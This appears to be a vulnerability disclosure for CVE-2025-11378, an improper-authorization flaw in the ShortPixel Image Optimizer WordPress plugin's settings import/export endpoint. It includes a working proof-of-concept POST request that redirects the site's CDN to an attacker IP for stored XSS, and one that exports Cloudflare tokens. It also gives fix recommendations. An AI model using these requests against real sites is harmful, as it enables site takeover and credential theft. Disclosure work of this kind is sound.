ShortPixel Image Optimizer is a popular WordPress plugin (300k+ installs) for image compression and CDN delivery. During security testing, we identified CVE-2025-11378, an Improper Authorization flaw in the plugin’s settings import/export AJAX endpoint: it accepts a nonce obtainable by low-privileged users (e.g., Contributor+) but never enforces an admin-level capability such as manage_options. As a result, a low-privileged account can import arbitrary global settings (including enabling CDN and pointing CDNDomain to an attacker-controlled host) and export the full configuration, leading to admin-equivalent impact via Stored XSS and front-end defacement, as well as exposure of sensitive CDN/Cloudflare tokens that can be abused to compromise external infrastructure.
| CVE | CVE-2025-11378 |
| Plugin Version | ShortPixel Image Optimizer <= 6.3.4 |
| Critical | High |
| All Time | 17 773 050 |
| Active installations | 300 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11378 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortpixel-image-optimiser/shortpixel-image-optimizer-634-authenticated-contributor-settings-importexport |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| September 23, 2025 | Plugin testing and vulnerability detection in the ShortPixel Image Optimizer have been completed |
| September 23, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 22, 2025 | Registered CVE-2025-11378 |
Discovery of the Vulnerability
The issue surfaced during a white-box security review focused on ShortPixel’s AJAX surface and configuration handling. While mapping wp_ajax_* hooks, the shortpixel_ajaxRequest handler stood out because it multiplexes many internal actions via the screen_action and type parameters. Manual inspection of the corresponding callback for settings/importexport showed that it accepted both actionType=import and actionType=export without any explicit capability enforcement. Further testing confirmed that a Contributor user, after loading an admin screen such as post-new.php, received a valid nonce for shortpixel_ajaxRequest in the page source or inline script. Replaying that nonce in a crafted POST request to /wp-admin/admin-ajax.php with screen_action=settings/importexport&type=settingssucceeded, both for importing arbitrary JSON and for exporting the complete serialized options. No additional checks limited this behavior to administrators. At that point it became clear that this was not merely overbroad functionality, but a systematic improper authorization flaw on a highly privileged settings surface, with a direct path to Stored XSS and configuration data exfiltration.
Understanding of Missing Auth attack’s
Missing or improper authorization attacks on WordPress AJAX handlers typically arise when a developer relies only on a nonce for protection and neglects to verify user capabilities. A nonce in WordPress is primarily an anti-CSRF token and does not by itself express the user’s authorization level. If a nonce is exposed on pages available to Contributor or Author roles, then any functionality guarded solely by that nonce becomes accessible to those roles, even if conceptually intended for administrators. In this case, the shortpixel_ajaxRequest endpoint treats the nonce as if it were an authorization gate for settings import and export, but never calls current_user_can('manage_options') or a similar capability check before processing the request. Because the nonce is available on edit/post screens and other admin views reachable to non-admins, the effective precondition for calling the import/export code is just “is logged in and can load a page that prints this nonce,” which matches Contributor+. That is the core of the Missing Auth / Improper Authorization problem here: a high-impact, admin-grade operation (changing global CDN and optimization settings, exposing Cloudflare keys) is bound only to a CSRF token instead of a privilege level, so lower-privileged accounts can drive it directly. Once they can change CDN endpoints or inject attacker-controlled JavaScript paths, the blast radius escalates to stored XSS and full front-end compromise.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-11378, an attacker with Contributor+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 210 Origin: http://127.0.0.1 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: Cookie_of_Contributor+ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=shortpixel_ajaxRequest&nonce=nonce_from_http://127.0.0.1/wordpress/wp-admin/post-new.php_in_nonce_ajaxrequest&screen_action=settings/importexport&type=settings&actionType=import&importData={"useCDN":true,"cdn_js":true,"cdn_css":true,"CDNDomain":"http://91.103.253.40:8088"} OR {"processThumbnails":false,"resizeImages":false,"backupImages":false,"CMYKtoRGBconversion":false,"createWebp":false,"createAvif":false,"deliverWebp":0,"optimizeRetina":false,"optimizeUnlisted":false,"optimizePdfs":false,"autoMediaLibrary":false,"doBackgroundProcess":false,"showCustomMedia":false,"useCDN":false,"cdn_js":false,"cdn_css":false,"enable_ai":false,"autoAI":false,"autoAIBulk":false,"ai_use_post":false,"ai_gen_alt":false,"ai_gen_caption":false,"ai_gen_description":false,"ai_gen_filename":false,"aiPreserve":false,"exif":0,"ai_general_context":"","ai_alt_context":"","ai_description_context":"","ai_caption_context":"","ai_filename_context":""} Plus Sensitive DATA Exposure + cloudflare key exposure: action=shortpixel_ajaxRequest&nonce=19b5cf4c80&screen_action=settings/importexport&type=settings&actionType=export____
Once this import succeeds, ShortPixel starts rewriting image, JS, and CSS URLs to the attacker’s domain. The attacker-hosted CDN can then serve trojanized JavaScript that runs on every front-end page load, achieving Stored XSS, session theft, admin takeover if an administrator visits the site, and visible defacement by altering CSS and layout. Alternatively, the attacker can perform a stealthier configuration tampering by disabling protection features, changing optimization behavior, or preparing more subtle payloads. For sensitive data exposure, the same Contributor account can use the nonce to call the export branch: screen_action=settings/importexport&type=settings&actionType=export. The plugin then returns a configuration blob that includes Cloudflare API tokens and other CDN or integration secrets. The attacker can exfiltrate this data and reuse those tokens to modify Cloudflare settings, hijack DNS or CDN configuration, or perform other actions against the victim’s infrastructure. All of this is possible without ever having administrator privileges; the only requirement is a low-privileged account that can see the nonce and send AJAX POSTs.
Recommendations for Improved Security
To mitigate this vulnerability, the settings import/export functionality must be strictly tied to administrator-level capabilities rather than just to a nonce. The handler behind shortpixel_ajaxRequest should, before processing any settings/importexport logic, enforce a clear capability check such as current_user_can('manage_options') and immediately wp_send_json_error() or wp_die() if the check fails. The nonce should remain as an anti-CSRF control but should never be used as the sole gatekeeper for privileged operations. In addition, the import path must validate that importData originates from a trusted context and should reject untrusted JSON supplied by low-privileged roles; for example, the plugin can restrict import to dedicated settings pages that only administrators can access. On the export side, the plugin should avoid returning raw secrets wherever possible. Cloudflare tokens and similar credentials should be stored and displayed in a redacted form and never included in generic “export settings” responses. If configuration export is necessary, sensitive fields should be excluded, masked, or encrypted, and only accessible to administrator roles. Finally, the vendor should audit all shortpixel_ajaxRequest branches and other AJAX/REST endpoints for consistent capability checks, ensure that nonces are treated strictly as CSRF defenses rather than authorization mechanisms, and add logging or alerts for settings import/export operations so that any future misuse can be detected and investigated quickly.
By taking proactive measures to address Missing Auth vulnerabilities like CVE-2025-11378 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.